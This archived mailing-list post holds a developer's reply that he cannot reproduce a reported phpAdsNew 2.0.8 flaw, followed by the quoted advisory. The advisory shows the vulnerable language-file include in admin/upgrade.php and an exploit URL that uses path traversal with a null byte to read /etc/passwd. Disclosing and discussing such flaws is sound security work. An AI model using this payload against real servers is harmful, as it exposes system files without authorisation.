I can't reproduce this on any of our phpAdsNew 2.0.8 installations. As it should, the login prompt is presented. Kind regards, Wim At 20:02 17/10/2006, suppressed wrote:
####################################### Autors: - Michał `wacky` Błaszczak - Nobody http://iHACK.pl ####################################### File: modules/phpads/admin/upgrade.php Code: // Load language stringsif (file_exists("../language/".$phpAds_config['language']."/default.lang.php"))include("../language/".$phpAds_config['language']."/default.lang.php"); else { $phpAds_config['language'] = 'english'; include("../language/english/default.lang.php"); } Exploit: http://ihack.pl/phpAdsNew-2.0.8/admin/ upgrade.php?phpAds_config[language]=../../../etc/passwd%00
Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.